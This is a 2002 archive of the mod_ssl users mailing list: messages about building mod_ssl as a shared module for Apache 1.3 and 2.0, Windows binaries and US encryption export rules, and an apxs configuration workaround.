> >To: 'modssl-users@modssl.org'
> >Subject: I am having a heck of a time - Please help.
> >
> >
> >I have poured through all the documentation I can find on
> >enabling mod_ssl
> >with Apache 1.3.26 but keep coming up short.  If I static link
> >the mod_ssl
> >it works fine but when I try to enable DSO and use it as a
> >shared library I
> >keep getting ap_add_config_define : referenced symbol not
> >found.  I have the
> >following config setup for the apache build:
> >
> >#!/bin/ksh
> >SSL_BASE=/usr/local/ssl \
> >EAPI_MM=../mm-1.1.3 \
> >EAPI_MM_CORE_PATH=logs/httpd.mm \
> >LIBS=/usr/lib/libC.so.5 \
> >CFLAGS=-fPIC \
> >./configure    --prefix=/opt/apache \
> >               --enable-rule=EAPI \
> >               --enable-module=ssl \
> >               --enable-shared=ssl \
> >               --disable-rule=SSL_COMPAT \
> >               --enable-rule=SSL_SDBM \
> >               --enable-suexec \
> >               --suexec-caller=http
> >
> >I have followed the instructions in the modssl install guide to patch
> >Apache.  Please verify the following build for mod_ssl:
> >
> >./configure    --with-apache=../apache_1.3.26 \
> >               --with-ssl=/usr/local/ssl \
> >               --with-mm=../mm-1.1.3
> >
> >If you can help (point me to some documentation) I would be
> >very grateful...
> >
> >
> >David S. Loesche
> >david.loesche@yipes.com                        Yipes
> >Communications, Inc.
> >Main:  (415) 901-2000                  114 Sansome Street, Suite 1045
> >Direct:        (415) 901-2210                  San Francisco, CA 94104
> >Fax:   (415) 901-2201                  http://www.yipes.com
> >
> >Yipes is the defining provider of fully scalable bandwidth for
> >businesses.
> >We offer fully managed high-speed Internet and Nationwide LAN-to-LAN
> >services at speeds ranging from 1 Mbps to 1 Gbps, in 1 Mbps
> >increments.
> >
> >Yipes delivers this uniquely flexible service over the first nationwide
> >system of optical IP networks.
> >
> >______________________________________________________________________
> >Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >User Support Mailing List                      modssl-users@modssl.org
> >Automated List Manager                            majordomo@modssl.org
> >
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

-- 
Glen S Mehn
Contract Systems Administrator		SquareTrade, Inc
glen@squaretrade.com	Building Trust in Transactions (sm)
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 16 06:52:49 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA02885; Tue, 16 Jul 2002 06:51:41 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mail.virginia.edu id GAA02859; Tue, 16 Jul 2002 06:50:36 +0200 (MET DST)
Received: from node13.unix.virginia.edu by mail.virginia.edu id aa04899;
          16 Jul 2002 0:50 EDT
Received: from localhost (jcw5q@localhost)
	by node13.unix.Virginia.EDU (8.9.3/8.9.3) with ESMTP id AAA69304
	for ; Tue, 16 Jul 2002 00:50:30 -0400
X-Authentication-Warning: node13.unix.Virginia.EDU: jcw5q owned process doing -bs
Date: Tue, 16 Jul 2002 00:50:30 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender:  
To: modssl-users@modssl.org
MMDF-Warning:  Parse error in original version of preceding line at mail.virginia.edu
Subject: Re: Mod_SSL for Windows 2000/NT/XP
In-Reply-To: <20020716115432.A18366@uow.edu.au>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, 16 Jul 2002, Brendan Lloyd wrote:

> And last but not least: can anyone clarify what the state of Apache
> 2.0 is with regards to OpenSSL/mod_ssl? I've read in some places that
> Apache 2.0 supports/includes these, but then when I went to download
> the Windows binary distribution it had the suffix "no_ssl"?

Source distributions of Apache 2.0 include mod_ssl.  Binary distributions
are a different story, but only because of ambiguities surrounding the
(IMHO silly) export restrictions of the US government.  We know we're
allowed to export *source* for strong encryption software... but whether
we're able to legally distribute *binaries* of strong encryption software
is unclear.  So we don't.

Of course, that's more of a burden on our Windows users than on our Unix
users, since the former tend to rely on binaries and the latter tend to
roll their own since they tend to have the compilation tools on hand.

The solution, as has been pointed out, is that somebody outside the US
contributed binaries for mod_ssl for Apache 2.0 on Win32 and uploaded them
to www.modssl.org/contrib, which is physically located in Germany, as
opposed to www.apache.org, which is physically located in the western US.

Sigh.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 16 12:55:26 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA21852; Tue, 16 Jul 2002 12:54:23 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mhub.AXP.MDX.AC.UK id MAA21822; Tue, 16 Jul 2002 12:53:33 +0200 (MET DST)
Received: from CONVERSION-DAEMON.mdx.ac.uk by mdx.ac.uk (PMDF V6.1-1 #38636)
 id <01KK5TX8S1PS000D5Q@mdx.ac.uk> for modssl-users@modssl.org; Tue,
 16 Jul 2002 11:53:01 +0100 (BST)
Received: from mdx-he-staff2.nw.mdx.ac.uk
 (mdx-he-staff2.mdx.ac.uk [158.94.88.6]) by mdx.ac.uk (PMDF V6.1-1 #38636)
 with ESMTP id <01KK5TX6RU8K0007GF@mdx.ac.uk> for modssl-users@modssl.org; Tue,
 16 Jul 2002 11:52:58 +0100 (BST)
Received: from MDX-HE-STAFF2/SpoolDir by mdx-he-staff2.nw.mdx.ac.uk
 (Mercury 1.48); Tue, 16 Jul 2002 11:49:17 +0000
Received: from SpoolDir by MDX-HE-STAFF2 (Mercury 1.48); Tue,
 16 Jul 2002 11:49:08 +0000
Received: from [1] (158.94.89.102) by mdx-he-staff2.nw.mdx.ac.uk (Mercury 1.48)
 with ESMTP; Tue, 16 Jul 2002 11:49:03 +0000
Date: Tue, 16 Jul 2002 11:49:02 +0100
From: Alex Moon 
Subject: Re: Mod_SSL for Windows 2000/NT/XP
In-reply-to: 
To: modssl-users@modssl.org
Message-id: 
Organization: Middlesex University
MIME-version: 1.0
X-Mailer: Pegasus Mail for Win32 (v3.12a)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
References: <20020716115432.A18366@uow.edu.au>
X-Comment: Middlesex University has scanned this message for viruses.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alex Moon 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Could the mirror sites not host ssl enabled version as they are not 
in the US as they are in the Uk, Austrailia etc?

On 16 Jul 02, at 0:50, Cliff Woolley wrote:

> On Tue, 16 Jul 2002, Brendan Lloyd wrote:
> 
> > And last but not least: can anyone clarify what the state of Apache
> > 2.0 is with regards to OpenSSL/mod_ssl? I've read in some places that
> > Apache 2.0 supports/includes these, but then when I went to download
> > the Windows binary distribution it had the suffix "no_ssl"?
> 
> Source distributions of Apache 2.0 include mod_ssl.  Binary distributions
> are a different story, but only because of ambiguities surrounding the
> (IMHO silly) export restrictions of the US government.  We know we're
> allowed to export *source* for strong encryption software... but whether
> we're able to legally distribute *binaries* of strong encryption software
> is unclear.  So we don't.
> 
> Of course, that's more of a burden on our Windows users than on our Unix
> users, since the former tend to rely on binaries and the latter tend to
> roll their own since they tend to have the compilation tools on hand.
> 
> The solution, as has been pointed out, is that somebody outside the US
> contributed binaries for mod_ssl for Apache 2.0 on Win32 and uploaded them
> to www.modssl.org/contrib, which is physically located in Germany, as
> opposed to www.apache.org, which is physically located in the western US.
> 
> Sigh.
> 
> --Cliff
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org



Technical Manager
Online Learning Support Unit
Middlesex University Business School

a.moon@mdx.ac.uk
020 8411 5092

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 16 18:07:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA08824; Tue, 16 Jul 2002 18:06:30 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mhub.AXP.MDX.AC.UK id SAA08739; Tue, 16 Jul 2002 18:06:09 +0200 (MET DST)
Received: from CONVERSION-DAEMON.mdx.ac.uk by mdx.ac.uk (PMDF V6.1-1 #38636)
 id <01KK64UYMKUO000KBN@mdx.ac.uk> for modssl-users@modssl.org; Tue,
 16 Jul 2002 17:05:48 +0100 (BST)
Received: from mdx-he-staff2.nw.mdx.ac.uk
 (mdx-he-staff2.mdx.ac.uk [158.94.88.6]) by mdx.ac.uk (PMDF V6.1-1 #38636)
 with ESMTP id <01KK64UOTQXO000IT1@mdx.ac.uk> for modssl-users@modssl.org; Tue,
 16 Jul 2002 17:05:40 +0100 (BST)
Received: from MDX-HE-STAFF2/SpoolDir by mdx-he-staff2.nw.mdx.ac.uk
 (Mercury 1.48); Tue, 16 Jul 2002 17:01:58 +0000
Received: from SpoolDir by MDX-HE-STAFF2 (Mercury 1.48); Tue,
 16 Jul 2002 17:01:37 +0000
Received: from [1] (158.94.89.102) by mdx-he-staff2.nw.mdx.ac.uk (Mercury 1.48)
 with ESMTP; Tue, 16 Jul 2002 17:01:32 +0000
Date: Tue, 16 Jul 2002 17:01:31 +0100
From: Alex Moon 
Subject: loading mod ssl under NT
To: modssl-users@modssl.org
Message-id: 
Organization: Middlesex University
MIME-version: 1.0
X-Mailer: Pegasus Mail for Win32 (v3.12a)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
X-Comment: Middlesex University has scanned this message for viruses.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alex Moon 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi

I've been trying to get apache 2.0.39 +modssl to work under winNT. 
 But i am failing at the first hurdle i.e. i cannot seem to get the 
apache mod_ssl.so module to load.  It comes up with the following:

 Cannot load C:/apache2/modules/mod_ssl.so into server: The 
operating system cannot run %1

Any ideas greatfully received

Alex

Technical Manager
Online Learning Support Unit
Middlesex University Business School

a.moon@mdx.ac.uk
020 8411 5092

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 16 18:14:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA09445; Tue, 16 Jul 2002 18:13:22 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bistromath.cs.virginia.edu id SAA09369; Tue, 16 Jul 2002 18:12:00 +0200 (MET DST)
Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id g6GGBDkI000533
	for ; Tue, 16 Jul 2002 12:11:13 -0400
Date: Tue, 16 Jul 2002 12:11:13 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Mod_SSL for Windows 2000/NT/XP
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, 16 Jul 2002, Alex Moon wrote:

> Could the mirror sites not host ssl enabled version as they are not
> in the US as they are in the Uk, Austrailia etc?

The way our mirroring system works, the mirrors do an rsync of
www.apache.org/dist.  So they can't have files on their sites that aren't
on the main sites (or at least not for long), since rsync would delete
those files.

Additionally, it requires somebody outside the US do actually do the
compiling and uploading -- and all our Win32 guys (who are committers and
thus allowed to create official binaries) are in the US.  :-/

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 16 19:40:33 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA13728; Tue, 16 Jul 2002 19:39:34 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id TAA13640; Tue, 16 Jul 2002 19:37:47 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 322C24CE77F; Tue, 16 Jul 2002 19:37:41 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 2F5C628AF5; Tue, 16 Jul 2002 19:36:44 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from lopette.org id RAA08227; Tue, 16 Jul 2002 17:59:12 +0200 (MET DST)
Date: Tue, 16 Jul 2002 09:04:55 -0700
Message-Id: <200207160904.AA1089143348@lopette.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
From: "arcean" 
To: 
Subject: Apache & Websphere application server
X-Mailer: 
X-IMSTrailer: __IMail_5__
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "arcean" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

hello *,

I trying to make apache, SSL and Websphere works together ...

and i have the "famous" probleme
"loaded DSO /apps/[..]/mod_app_server.so uses plain Apache api ... this module migth crash ... re compile it with -DEAPI "

my probleme is : i don't have the source code of the websphere plugin ...

do you know a way to use mod_ssl without compiling apache 
or compiling apache to perfectly support the old way DSO module ??

thanx by advance
--
arno



__________________________________________________
D O T E A S Y - "Join the web hosting revolution!"
             http://www.doteasy.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 16 19:40:42 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA13774; Tue, 16 Jul 2002 19:39:58 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id TAA13629; Tue, 16 Jul 2002 19:37:44 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id D4BC74CE773; Tue, 16 Jul 2002 19:37:40 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 68E1428AF0; Tue, 16 Jul 2002 19:35:45 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from uza01.uza.uia.ac.be id LAA16841; Tue, 16 Jul 2002 11:20:22 +0200 (MET DST)
Received: by uza01.uza.uia.ac.be with Internet Mail Service (5.5.2653.19)
	id ; Tue, 16 Jul 2002 11:20:17 +0200
Message-ID: 
From: "Andries, Bert" 
To: "'modssl-users@modssl.org'" 
Subject: mod_ssl & mod_auth_radius
Date: Tue, 16 Jul 2002 11:20:13 +0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Andries, Bert" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Apache_1.3.26 + mod_ssl-2.8.10 + openssl-0.9.6d ( as in
http://www.modssl.org/example with added mod_proxy and mod_auth_radius found
at:
https://www.gnarst.net/authradius/

Proxy & Ssl seems to work fine, but the combination with radius
authentication fails.

The https://www.gnarst.net/authradius/ site mentions:
 Apply this patch to the Apache sourcecode apache-patches.tar.gz for
use with apache 1.3.26 with modssl-2810 if you are going to use this apache
as a proxy server. This will fix the fact that the 'proxing' webserver does
not send the cookie back to the client. It also will fix the problem that
apache does not send a Set-Cookie header back to the client in case the page
requsted has not changed (Return code 304) HTTP_NOT_MODIFIED.

Unfortunately the apache-patches.tar.gz is not downloadable.  Does anyone
has this patch, or has any hint on how to do radius authentication on a
proxy-ing apache with mod_ssl ...

Regards.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 16 19:41:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA13793; Tue, 16 Jul 2002 19:40:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id TAA13607; Tue, 16 Jul 2002 19:37:40 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 141EB4CE73D; Tue, 16 Jul 2002 19:37:40 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id BFF2C2874C; Tue, 16 Jul 2002 19:34:55 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from cesam.gfk-palace.org id GAA02676; Tue, 16 Jul 2002 06:44:51 +0200 (MET DST)
Received: from mac.gfk-palace.org ([192.168.0.1])
	by cesam.gfk-palace.org (8.11.6/8.8.7) with ESMTP id g6G2nBC01576
	for ; Mon, 15 Jul 2002 22:49:13 -0400
Mime-Version: 1.0
Message-Id: 
Date: Mon, 15 Jul 2002 22:49:10 -0400
To: mod_ssl Users Mailing List 
From: Guillaume Filion 
Subject: Re: Problems when compiling as DSO module (and workaround)
Content-Type: text/plain; charset="iso-8859-1" ; format="flowed"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id GAA02713
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Guillaume Filion 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Replying to myself (again)...

>  I think that the problem is with apxs, it only gets the CFLAGS 
>configured at Apache's compile time. And they are not right for 
>every module that one will want to add to Apache.
>
>  Take for example ndbm.h which is needed by mod_ssl. When compiling 
>mod_ssl statically into Apache, there's no problem since Apache 
>takes care of finding where it is located. But when we're building 
>mod_ssl with apxs, if Apache's configure has not figured out where 
>ndbm.h is, compilation will fail.
>[...]
>This is wrong since not enabling a module that requires DBM doesn't 
>mean that I'll never want to add one that does in the future.
>
>I don't see any trivial solution to this problem. The easier one, 
>IMHO, is to do every check when mod_so is enabled.

Adding this to src/modules/standard/mod_so.c (in Apache tarball) does 
the trick:

  /* The section for the Configure script:
   * MODULE-DEFINITION-START
   * Name: so_module
   * ConfigStart
   . ./helpers/find-dbm-lib
   * ConfigEnd
   * MODULE-DEFINITION-END
   */

I didn't find any other helper/check to add, but a more experienced 
Apache developer may find more.

Best,
GFK's
-- 
Guillaume Filion
Logidac Tech., Beaumont, Québec, Canada - http://logidac.com/
PGP Key and more: http://guillaume.filion.org/      (this will redirect)
PGP Fingerprint: 14A6 720A F7BA 6C87 2331 33FD 467E 9198 3DED D5CA
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 16 19:41:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA13803; Tue, 16 Jul 2002 19:40:22 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id TAA13609; Tue, 16 Jul 2002 19:37:41 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 277AF4CE745; Tue, 16 Jul 2002 19:37:40 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id D292A28846; Tue, 16 Jul 2002 19:34:58 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from cesam.gfk-palace.org id GAA02677; Tue, 16 Jul 2002 06:44:53 +0200 (MET DST)
Received: from mac.gfk-palace.org ([192.168.0.1])
	by cesam.gfk-palace.org (8.11.6/8.8.7) with ESMTP id g6G1lVC01403
	for ; Mon, 15 Jul 2002 21:47:31 -0400
Mime-Version: 1.0
Message-Id: 
In-Reply-To: 
References: 
Date: Mon, 15 Jul 2002 21:47:30 -0400
To: mod_ssl Users Mailing List 
From: Guillaume Filion 
Subject: Re: Problems when compiling as DSO module (and workaround)
Content-Type: text/plain; charset="iso-8859-1" ; format="flowed"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id GAB02713
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Guillaume Filion 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi all,

I tried to figure out what caused these two problems, here's what I found.

I think that the problem is with apxs, it only gets the CFLAGS 
configured at Apache's compile time. And they are not right for every 
module that one will want to add to Apache.

Take for example ndbm.h which is needed by mod_ssl. When compiling 
mod_ssl statically into Apache, there's no problem since Apache takes 
care of finding where it is located. But when we're building mod_ssl 
with apxs, if Apache's configure has not figured out where ndbm.h is, 
compilation will fail.

Here's an example:

$ tar zxf apache_1.3.26.tar.gz
$ cd apache_1.3.26

$ ./configure --enable-module=so
$ make
$ make install
$ /usr/local/apache/bin/apxs -q CFLAGS
-DLINUX=22 -DUSE_HSREGEX -DUSE_EXPAT -I../lib/expat-lite

apxs does not provide the location of ndbm.h since configure didn't needed it.

$ cd ..
$ rm -rf apache_1.3.26
$ tar zxf apache_1.3.26.tar.gz
$ cd apache_1.3.26

If, for example, I enable mod_rewrite which requires DBM support, 
apxs will "know" where to look for DBM.

$ ./configure --enable-module=so --enable-module=rewrite
[...]
  + adding selected modules
     o rewrite_module uses ConfigStart/End
  + using -ldb1 for DBM support
       enabling DBM support for mod_rewrite
[...]
$ make
$ make install
$ /usr/local/apache/bin/apxs -q CFLAGS
-DLINUX=22 -I/usr/include/db1 -DUSE_HSREGEX -DUSE_EXPAT -I../lib/expat-lite

This is wrong since not enabling a module that requires DBM doesn't 
mean that I'll never want to add one that does in the future.

I don't see any trivial solution to this problem. The easier one, 
IMHO, is to do every check when mod_so is enabled.


It's a similar problem for the DBM library, src/Makefile stores it into:
LIBS1=  -lm -lcrypt -ldb1 -ldl
[...]
LIBS=$(EXTRA_LIBS) $(LIBS1)
but this is not exported to apxs. I'm not sure if it should.

Am I making some sense here? What do people think about this? Should 
I file a bug report to Apache about this? I searched bugs.apache.org 
about this but I couldn't find a single bug about apxs...

I think I need a drink! 8)
GFK's
-- 
Guillaume Filion
Logidac Tech., Beaumont, Québec, Canada - http://logidac.com/
PGP Key and more: http://guillaume.filion.org/      (this will redirect)
PGP Fingerprint: 14A6 720A F7BA 6C87 2331 33FD 467E 9198 3DED D5CA
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 16 19:41:23 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA13805; Tue, 16 Jul 2002 19:40:22 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id TAA13630; Tue, 16 Jul 2002 19:37:45 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id E363B4CE775; Tue, 16 Jul 2002 19:37:40 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 8F53E28695; Tue, 16 Jul 2002 19:36:15 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from cesam.gfk-palace.org id OAA27904; Tue, 16 Jul 2002 14:51:21 +0200 (MET DST)
Received: from mac.gfk-palace.org ([192.168.0.1])
	by cesam.gfk-palace.org (8.11.6/8.8.7) with ESMTP id g6GCpIC07909
	for ; Tue, 16 Jul 2002 08:51:18 -0400
Mime-Version: 1.0
Message-Id: 
In-Reply-To: 
 
References: 
 
Date: Tue, 16 Jul 2002 08:51:17 -0400
To: modssl-users@modssl.org
From: Guillaume Filion 
Subject: Re: Mod_SSL for Windows 2000/NT/XP
Content-Type: text/plain; charset="iso-8859-1" ; format="flowed"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id OAA27920
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Guillaume Filion 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

At 00:50 -0400 16/07/02, Cliff Woolley wrote:
>On Tue, 16 Jul 2002, Brendan Lloyd wrote:
>
>>  And last but not least: can anyone clarify what the state of Apache
>>  2.0 is with regards to OpenSSL/mod_ssl? I've read in some places that
>>  Apache 2.0 supports/includes these, but then when I went to download
>>  the Windows binary distribution it had the suffix "no_ssl"?
>
>Source distributions of Apache 2.0 include mod_ssl.  Binary distributions
>are a different story, but only because of ambiguities surrounding the
>(IMHO silly) export restrictions of the US government.  We know we're
>allowed to export *source* for strong encryption software... but whether
>we're able to legally distribute *binaries* of strong encryption software
>is unclear.  So we don't.
>
>Of course, that's more of a burden on our Windows users than on our Unix
>users, since the former tend to rely on binaries and the latter tend to
>roll their own since they tend to have the compilation tools on hand.
>
>The solution, as has been pointed out, is that somebody outside the US
>contributed binaries for mod_ssl for Apache 2.0 on Win32 and uploaded them
>to www.modssl.org/contrib, which is physically located in Germany, as
>opposed to www.apache.org, which is physically located in the western US.
>
>Sigh.

Those interested in details on this legal stuff can see this site: 
http://www.bxa.doc.gov/Encryption/

What is nice with this policy update is that source code is now 
considered "unrestricted" (like Cliff said):
-----
Also for the first time, all encryption source code that would be 
considered publicly available under Section 734.3(b)(3) of the EAR 
(such as source code posted to the Internet) and the corresponding 
object code may be exported and reexported under License Exception 
TSU -- Technology and Software Unrestricted (specifically, Section 
740.13(e) of the EAR), once notification (or a copy of the source 
code) is provided to BIS and the ENC Encryption Request Coordinator. 
See Note. Even if a license fee or royalty is charged for commercial 
production or sale of products developed using the source code, such 
source code is eligible for license exception TSU and no post-export 
reporting is required.
-----
The complete content of the Export Administration Regulation (EAR) is 
available at: http://w3.access.gpo.gov/bis/ear/ear_data.html
Disclamer: reading the content of the EAR may cause an headache. 8)

It looks like binaries made from publically available source code are 
still considered "unrestricted". They explicitly say "[publically 
available source code] and the corresponding object code may be 
exported and reexported under License Exception TSU".

But the License Exception TSU states:
-----
(2)  Provisions and Destinations.

	(i)  Provisions.  Operation software may be exported or
	reexported provided that both of the following conditions
	are met:

		(A)  The operation software is the minimum
		necessary to operate equipment authorized for
		export or reexport; and

		(B)  The operation software is in object code.
-----
mod_ssl is not the "minimum necessary to operate equipment" since 
it's an add-on module; Apache can work without mod_ssl. And part B 
totally confused me, it says that ONLY object code can be exported...

I guess Apache's official policy is "let's not take chance." That 
sucks... Couldn't they hire a legal advisor that could sort this out?

Or easier, can't we just give a call to the BXA and ask them "Do 
object code made from publically available source-code still falls 
under the License Exception TSU?", that would clear up the 
question... We could ask them for a signed letter, and if we get 
problems in the future, we could just show the letter and say that we 
did our homework.

Ok, putting everything on modssl.org/contrib is MUCH MUCH easier.

GFK's
-- 
Guillaume Filion
Logidac Tech., Beaumont, Québec, Canada - http://logidac.com/
PGP Key and more: http://guillaume.filion.org/      (this will redirect)
PGP Fingerprint: 14A6 720A F7BA 6C87 2331 33FD 467E 9198 3DED D5CA
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 16 19:41:26 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA13819; Tue, 16 Jul 2002 19:40:32 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id TAA13633; Tue, 16 Jul 2002 19:37:45 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 132734CE77A; Tue, 16 Jul 2002 19:37:41 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 1B1DF28872; Tue, 16 Jul 2002 19:36:39 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from LX1IMS010.optimus.pt id RAA07286; Tue, 16 Jul 2002 17:35:41 +0200 (MET DST)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Subject: Problem with client digital certificate
Date: Tue, 16 Jul 2002 16:35:32 +0100
Message-ID: 
Thread-Topic: Problem with client digital certificate
Thread-Index: AcIs3qdV49ThjR6OQaOwEk04B8qolQ==
From: =?iso-8859-1?Q?Jo=E3o_Serras_Rodrigues?= 
To: 
Content-Transfer-Encoding: 8bit
